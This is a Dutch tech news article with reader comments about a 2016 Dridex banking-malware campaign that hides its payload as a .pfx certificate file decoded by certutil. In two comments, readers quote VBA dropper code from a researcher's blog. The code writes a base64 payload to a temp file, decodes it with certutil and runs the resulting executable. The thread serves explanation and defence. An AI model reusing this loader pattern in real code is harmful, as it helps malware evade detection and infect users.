Aangepaste Dridex-malware vermomt zichzelf als certificaat

Een nieuwe vorm van Dridex-malware blijkt na een korte periode van inactiviteit vooral actief te zijn in Amerika. De via spam verspreide malware doet zich voor als een certificaat om aan detectie te ontsnappen.

In een blogpost beschrijft beveiligingsbedrijf Trend Micro dat de spam-e-mail zich voordoet als een notificatie van het feit dat er een ongeautoriseerde toegangspoging tot een onbepaald account heeft plaatsgevonden. Daarbij wordt een ip-adres vermeld waarvan de poging afkomstig zou zijn, om de indruk van een legitiem bericht te wekken.

De mail roept de gebruiker op een zip-bestand te openen om een volledig rapport van het 'incident' te lezen. Eenmaal uitgepakt bevat het bestand een leeg Word-document, dat de gebruiker vraagt om macro's in te schakelen om de inhoud te kunnen zien. Doet de gebruiker dit, dan vindt infectie plaats. Infectie via macro's is niet nieuw en is een veelgebruikte manier malware te verspreiden.

Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt. Dit soort bestanden bevatten normaal gesproken informatie over publieke en geheime sleutels in het kader van overdracht van certificaten. Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.

Door de vermomming als pfx-bestand is de kwaadaardige software moeilijker te detecteren en tegen te gaan, zo schrijft Trend Micro. Dridex-malware is er vooral op gericht om financiële informatie te achterhalen, bijvoorbeeld inloggegevens voor internetbankieren. Het gebruik van pfx-bestanden toont volgens het beveiligingsbedrijf aan dat de ontwikkeling van de malware nog steeds in gang is.

Door Sander van Voorst

Nieuwsredacteur

Feedback • 01-06-2016 18:24 36

01-06-2016 • 18:24

36

Lees meer

VS klaagt twee verdachten achter Evil Corp en Dridex-bankmalware aan
VS klaagt twee verdachten achter Evil Corp en Dridex-bankmalware aan Nieuws van 5 december 2019
'Enkele grote malwarevarianten vertonen minder activiteit na arrestaties'
'Enkele grote malwarevarianten vertonen minder activiteit na arrestaties' Nieuws van 17 juni 2016
OM waarschuwt voor toenemend gebruik rat-malware in Nederlandse bedrijven
OM waarschuwt voor toenemend gebruik rat-malware in Nederlandse bedrijven Nieuws van 9 juni 2016
Beveiligingsonderzoeker zet spelfouten in om willekeurige code uit te voeren
Beveiligingsonderzoeker zet spelfouten in om willekeurige code uit te voeren Nieuws van 9 juni 2016
Fox-IT waarschuwt voor grote hoeveelheid phishing-e-mails met LinkedIn-gegevens
Fox-IT waarschuwt voor grote hoeveelheid phishing-e-mails met LinkedIn-gegevens Nieuws van 7 juni 2016
Russische veiligheidsdienst arresteert 50 hackers voor stelen 1,7 miljard roebel
Russische veiligheidsdienst arresteert 50 hackers voor stelen 1,7 miljard roebel Nieuws van 1 juni 2016
Schade door fraude internetbankieren daalt met miljoen euro
Schade door fraude internetbankieren daalt met miljoen euro Nieuws van 8 april 2016
'Nederlandse internetgebruikers hebben kleinste kans op virussen'
'Nederlandse internetgebruikers hebben kleinste kans op virussen' Nieuws van 8 februari 2016
'Verspreiding financiële Dyre-malware gestopt door Russische autoriteiten'
'Verspreiding financiële Dyre-malware gestopt door Russische autoriteiten' Nieuws van 8 februari 2016
Miljoenenbotnet weet negen jaar lang onder de radar te blijven
Miljoenenbotnet weet negen jaar lang onder de radar te blijven Nieuws van 2 december 2015
Onderzoekers ontwikkelen methode voor veilig online stemmen
Onderzoekers ontwikkelen methode voor veilig online stemmen Nieuws van 1 mei 2015
Schade door bankmalware daalt met 90 procent
Schade door bankmalware daalt met 90 procent Nieuws van 18 maart 2015
Hackers stelen honderden miljoenen via onder meer Nederlandse banken - update
Hackers stelen honderden miljoenen via onder meer Nederlandse banken - update Nieuws van 15 februari 2015
Meer producten en artikelen
Netwerk en systeembeheer Malware Security

Reacties (36)

-Moderatie-faq
36
34
17
5
1
15
Wijzig sortering

Sorteer op:

Weergave:
pietje63 1 juni 2016 18:42
Tweakers.net
Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt.
Trendlab
There are slight changes in this particular DRIDEX spam run. When you open the .ZIP file attachment and the word document, a .PFX file is dropped. However, this won’t necessairly run on your system because it’s encrypted. This is where Certutil comes in, decoding a base64-text file to convert the .PFX file to .EXE file. When the .PFX file is finally converted into an executable file, DRIDEX infects your system.
Als ik Trendlab goed begrijp wordt - in tegenstelling tot het stuk van T.net - de PFX dus pas gemaakt door de Macro in het Word document (en zit deze niet in de ZIP).

Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
photofreak @pietje631 juni 2016 19:39
Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt. Dit soort bestanden bevatten normaal gesproken informatie over publieke en geheime sleutels in het kader van overdracht van certificaten. Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.
Ik vind het merkwaardig dat TrendMicro stelt dat het PFX file versleuteld is, het is hooguit base64 encoded. Als je de MSDN documentatie van Certutil erbij pakt dan is dat gelijk al duidelijk. Het enige doel dat Certutil in dit geval heeft is het base64 decoden van het stukje malware buiten MS Office om zodat detectiesoftware niet gelijk een (malicious) executable naar disk weggeschreven ziet worden vanuit Word.

Overigens is deze 'Certutil'-techniek al ruim een week geleden door een researcher beschreven: http://www.malwaretech.co...payload-distribution.html . Op zijn blog wordt ook het stuk VBA code wordt getoond dat verantwoordelijk is voor het aanroepen van Certutil.
[...]

Als ik Trendlab goed begrijp wordt - in tegenstelling tot het stuk van T.net - de PFX dus pas gemaakt door de Macro in het Word document (en zit deze niet in de ZIP).

Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
Het uitvoeren van de macro triggert de 'conversie'. Zoals blijkt uit de gedumpte VBA code op de blog van Malwaretech wordt de executable gelijk uitgevoerd na het decoden:
FileObject = CreateObject("Scripting.FileSystemObject")
target = Environ("TEMP") & "\microsoft.pfx"
file = FileObject.CreateTextFile(target, True)
file.Write(base64)
file.Close Shell("cmd /c certutil -decode %TMP%\\microsoft.pfx %TMP%\\microsoft.exe & start %TMP%\\microsoft.exe")

[Reactie gewijzigd door photofreak op 26 juli 2024 07:20]

Baserk @pietje631 juni 2016 19:24
Nope, geen dubbelklik meer voor nodig volgens Malwaretech.com;
FileObject = CreateObject
("Scripting.FileSystemObject")
target = Environ("TEMP") & "\microsoft.pfx"
file = FileObject.CreateTextFile(target, True)
file.Write(base64)
file.Close Shell("cmd /c certutil -decode %TMP%\\microsoft.pfx %TMP%\\microsoft.exe & start %TMP%\\microsoft.exe")

What this does is dumps the Base64 encoded string to a file named "microsoft.pfx" (pfx files are used to store PKCS#12 certificates), then it uses "certutil" to Base64 decode it, like you'd do with a regular certificate, into a file named microsoft.exe where it can be run. Link

[Reactie gewijzigd door Baserk op 26 juli 2024 07:20]

Tribits @pietje631 juni 2016 19:04
Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
Hoewel ik toegeef dat ze er onduidelijk in zijn lijkt het mij onwaarschijnlijk dat er nog verdere actie van de gebruiker nodig is. De Word macro taal (Visual Basic for Applications) is prima in staat om zelfstandig commando's uit te voeren die dergelijke acties tot gevolg hebben. Ik denk dat de onduidelijkheid ontstaan is doordat men de werking van deze malware wat meer inzichtelijk heeft proberen te maken voor de gemiddelde lezer.
Verwijderd @pietje631 juni 2016 19:08
Dat iemand een zip bestand van een vreemde opent en tweemaal uitvoert dan ben je al niet al te helder bezig maar certutil is pas beschikbaar in windows 8.1 en windows 10
Gebruikers van windows 7 kan dit dus niet eens overkomen.
djwice @Verwijderd1 juni 2016 23:32
Ik heb zo'n 120 van die mails per dag gekregen en ze kwamen door de spam en virus filters van Google heen voor een paar dagen, ondanks het melden van deze e-mails.

Ik kan me voorstellen dat veel mensen denken dat als je iets vaker krijgt en Google ziet het niet als virus, dat het dan ook geen virus is. Onterecht, maar tja..


Merk op dat dit een paar weken geleden ongezipt verstuurd werd, toen met een hogere verzend dichtheid tot wel 600 per dag ontving ik er.
Ook dat duurde even, maar werd sneller als virus gedetecteerd.

[Reactie gewijzigd door djwice op 26 juli 2024 07:20]

Verwijderd @pietje631 juni 2016 19:32
Welke dorpsgek opent er nu een zip bestand van een onbekende?
TonnyTonny @Verwijderd1 juni 2016 21:09
99% van alle normale kantoormedewerkers is zo gek.
Echt... Zo komen hier dagelijks voorbij...
Een computer-rijbewijs zou eigenlijk verplicht moeten zijn voordat iemand een email-adres krijgt.
Gomez12 @Verwijderd2 juni 2016 00:54
Ehm, 99% van de computergebruikers (zoniet 100%)...

Of durf jij daadwerkelijk te zeggen dat jij de maker van elk zip-bestand wat je ooit opent echt daadwerkelijk kent en weet dat die het doelbewust naar jou toegestuurd heeft?

T.net heeft er een hele rubriek voor vol met zip's / exe's van onbekenden genaamd "Downloads"

Om nog maar te zwijgen over office gebruikers die continu zip-bestanden met aparte extensies openen.

[Reactie gewijzigd door Gomez12 op 26 juli 2024 07:20]

Verwijderd @Gomez122 juni 2016 01:14
Als ik een zip bestand ontvang weet ik heel goed of dit van een bekende is of niet, dus ja, dat durf ik daadwerkelijk te zeggen.

Aan de inhoud van de mail zie ik ook of een bekende dit bewust gezonden heeft.

Mocht dit zijn omdat hij of zij geïnfecteerd is dan mail ik de persoon in kwestie hierover

[Reactie gewijzigd door Verwijderd op 26 juli 2024 07:20]

Gomez12 @Verwijderd2 juni 2016 02:46
Als ik een zip bestand ontvang weet ik heel goed of dit van een bekende is of niet, dus ja, dat durf ik daadwerkelijk te zeggen.

Aan de inhoud van de mail zie ik ook of een bekende dit bewust gezonden heeft.
Dat is leuk voor mail, maar kan je hetzelfde ook nog zeggen over downloads?
Verwijderd @Gomez122 juni 2016 04:07
Uiteraard ik ben een gevorderde gebruiker en download alleen uit bekende bronnen en zelfs deze worden na downloaden geopend in een sandbox, ook vertrouwde bronnen kunnen wel eens geïnfecteerde bestanden hebben :)

Dat laatste raadt ik jou ook aan om te doen, je maakt je geloof ik nogal zorgen omtrent het downloaden.
Seal64 @Verwijderd2 juni 2016 06:25
Je wil niet weten hoeveel "gevorderde gebruikers" ik aan de telefoon heb gehad die niet eens kunnen zeggen welke webbrowser ze gebruiken...
Verwijderd @Seal642 juni 2016 11:55
iemands profiel even bekijken zegt vaak meer dan woorden.
Seal64 @Verwijderd2 juni 2016 11:59
Ik twijfel ook niet aan je kwalificaties, en als ik dat impliceerde was dat zeker niet mijn bedoeling, maar diezelfde redenering hoor je veel te vaak vandaag de dag van mensen die zichzelf heel wat vinden maar ondertussen het verschil tussen Edge, Chrome of Firefox niet kunnen zien.
Verwijderd @Seal642 juni 2016 12:04
Voor mensen die gevorde gebruikers zijn is dat ook een typisch gegeven.

Klant die Microsoft aan de lijn heeft: "ik heb al 10 keer op F1 help gedrukt, wannneer komt er nu iemand van Microsoft om te helpen?
CivLord @Verwijderd2 juni 2016 09:26
Wanneer de onbekende een dienst lijkt te zijn waar je een account hebt, zoals Google of Facebook.
Het is heel makkelijk om uit naam van Google een mail te versturen met alle gebruikelijke logo's, met een waarschuwing dat een onbekende jouw account geprobeerd heeft te openen en dat het begeleidende rapport meer informatie bevat.
Verwijderd @CivLord2 juni 2016 11:57
Ik gooi dagelijks een 20 tal van dat soort mails direc tin de prullenbak, ik neem aan dat je doelt op de gemiddelde thuisgebruiker die het misschien in onwetendheid opent..
RammY 1 juni 2016 20:32
Simpelweg in je spamfilter de macro-enabled Word documenten niet toestaan.
Vorige week heb ik ze hier op de zaak ook langs zien komen en daarna direct geblockt.
Ik heb dat soort docs nooit verstuurd.
Wil je het wel? Pass protected zip is je oplossing..

TIP: SaneSecurity FoxHole database in je spamfilter laden. Haalt de vreemde zipjes er zo voor je uit!
True 1 juni 2016 18:31
Nog zo'n gevalletje van wat een drama ... als de gebruiker een zip file opent van een niet bekend mailadres zonder achterliggende reden dat de gebruiker zoiets überhaupt moet ontvangen.
  • Onverwachte mail.
  • Verdachte bijlage.
  • Verdachte zip.
  • Verdacht word-document.
  • Verdachte melding over macro's.
DING DING DING

Gebruikers dit soort 'malware' overkomen kunnen beter een dichtgetimmerde versie van een OS gebruiken dan iets waarbij ze moeten nadenken.
pietje63 @True1 juni 2016 18:38
* e-mail van bekend bedrijf, over een account dat ik heb
* brief zit in bijlage, dat is gebruikelijk voor brieven
* die stomme macro meldingen ook altijd, OK

Voor de gemiddelde/beginnende computergebruiker zijn de alarmbellen niet zo duidelijk. Daarom is een virusscanner en spamfilter zo belangrijk. Deze moeten dergelijke mails tegenhouden om de gebruiker te beschermen. Jij noemt dat dichtgetimmerd OS, dat is een (verdergaand) alternatief waarmee gebruikers zich niet kunnen ontwikkelen.
Brummetje @pietje631 juni 2016 18:48
Brief zit in bijlage, klopt. Maar een brief zit niet in een zip. Mailtjes met een zip is bij voorbaat al in 99% van de gevallen verdacht.
evilBunny @Brummetje1 juni 2016 19:19
Ik werk bij een hosting provider en buiten dat je via de apis je aangevraagde certificaten van een leverancier krijgt komt er ook vaak een mailtje ... met een zip waar de ca bundle en cert in zit. Zo vreemd is een zipje niet in die wereld...
Dysmael @evilBunny1 juni 2016 19:24
In dat geval verwacht je deze specifieke mail en iemand die certs zal aanvragen is over het algemeen wat beter op de hoogte van IT-zaken.
tom.cx @Brummetje1 juni 2016 19:25
Daarom geven ze ook al langer advies om naast .exe ook .zip te blokkeren.

Bron;
https://www.security.nl/p...ZIP-bijlagen+blokkeren%22
http://tweakers.net/nieuws/47384/spammer-stapt-over-naar-encrypted-zip-bestanden.html
djwice @Brummetje1 juni 2016 23:40
Voor veel mensen is een zipje:

Click open, ik zie een windows Explorer mapje dat open is met een file, klik file.
-- gebruiker denk: ik had vast niet (goed) gedubbel klikt.

En is nu Word opend al lang weer vergeten dat dit gebeurt is, en denkt de word file direct uit de mail te openen.
Verwijderd @pietje631 juni 2016 19:42
2 Kb/16 Kb (leeg word document)

van een mail die je niet kent
in een ZIP file
bedrijf wat je niet kan natrekken (bellen/appen/smsen?)
macro-melding in word..

^ zoals true al zegt: DING DING DING DING

sorry dat ik het zeg.. maar 'beginnende' 'niet' computer gebruikers' zonder enige training what so ever.. hebben uberhaubt niks te zoeken op een pc met admin rechten.
als je echt ZO stom/onwetend bent (want dat ben je dan in de ogen van menig ITer, ZELFS als je manager 3.0 bent!!)

want kom op man.. het is 2016.. als mensen het nu NOG niet weten... (de 70 jarige bejaarde buiten beschouwing gelaten) en je zou werken in een bedrijf of nuttige info op je pc hebben staan..

dan VERDIEN je 't gewoon al het gezeik. alleen zo jammer dat dit soort mensen het nooit zelf hoeven te verantwoorden/op te lossen. daar zouden ze een boel van leren.
dan doe je zulke stomme dingen 1x en daarna nooit meer.
CivLord @Verwijderd2 juni 2016 09:19
2 Kb/16 Kb (leeg word document)
van een mail die je niet kent
in een ZIP file
bedrijf wat je niet kan natrekken (bellen/appen/smsen?)
macro-melding in word..
Het aantal kb's zegt vrijwel niemand wat.
De mail lijkt afkomstig te zijn van een bedrijf waar je een account hebt (Google, Facebook, etc.)
In een ZIP-file is op zich vreemd, maar niet meteen verontrustend.
Het bedrijf ken je (Google, Facebook, etc.), maar wie neemt de moete contact te zoeken en hoe kom je met ze in contact wanneer je dat zou willen?
Bij de macro-melding zou je je af kunnen vragen waarom er een macro in de brief moet zitten, maar je moet al een redelijke computerdeskundige zijn om te weten wat een macro is en waarom het vreemd is dat deze in een brief zit.

Niet iedereen is een computerdeskundige en dat kan ze niet kwalijk genomen worden.
Tribits @Webgnome1 juni 2016 18:57
Toen ik het bericht las had ik in eerste instantie ook wel zoiets dat je wel een erg onkundige gebruiker moet zijn om de macro's in te schakelen op een word document dat per email binnenkomt. Aan de andere kant zou het zeker in een zakelijke omgeving zo moeten zijn dat een dergelijke onkundige gebruiker niet tot verregaande schade leidt. Dat het lastig is om het uitvoeren van willekeurige scripts en executables te blokkeren doet daar verder niet zoveel aan af, het blijft toch een belangrijke tekortkoming van het systeem.

Zelfde geldt in min of meerdere mate voor thuisgebruikers. Hoewel ze misschien zelf zo gemakzuchtig zijn om overal ja op te klikken zou het al een stuk schelen als Windows je standaard niet met een admin account laat werken. Op het moment dat je iedere keer als er iets op admin niveau moet gebeuren gevraagd wordt om een wachtwoord (zoals bij Linux sudo) denk je wel twee keer na voordat je verder gaat. En in tegenstelling tot in het verleden komt het tegenwoordig bij normaal gebruik weinig meer voor dat er om admin rechten gevraagd wordt.

[Reactie gewijzigd door Tribits op 26 juli 2024 07:20]

Gomez12 @Tribits2 juni 2016 01:00
Aan de andere kant zou het zeker in een zakelijke omgeving zo moeten zijn dat een dergelijke onkundige gebruiker niet tot verregaande schade leidt.
Dat is een bijna onmogelijke taak... Want meestal heeft een medewerker nog wel zijn eigen zakelijke bestanden (offertes / projecten etc) die die moet kunnen bewerken en als die weg zijn dan kan alsnog menig proces stil komen te liggen
Firefly III 1 juni 2016 18:29
Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.
Slim. Ze encrypten de malware, geven het een "veilige" extensie en klaar is kees.

Maar voor je op dit punt bent aangekomen heb je als gebruiker al goed lopen prutsen.
Sicos 1 juni 2016 18:30
Zoals sommige mensen zouden zeggen... dat is kniftig gedaan... Maar nog beter kunnen dat soort mensen hun talent beter besteden aan goede dingen i.p.v. diefstal
Alex3 1 juni 2016 18:36
Als je niet onnodig met beheersrechten werkt kan het pfx-bestand niet "op het systeem" terechtkomen.
mikeoke 1 juni 2016 22:46
toch maar ook een .pfx filter naar quarantaine ingesteld voor mail verkeer.

Wie heeft een .pfx filter ook al op zijn http(s) of proxy verkeer ingesteld?

Op dit item kan niet meer gereageerd worden.

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq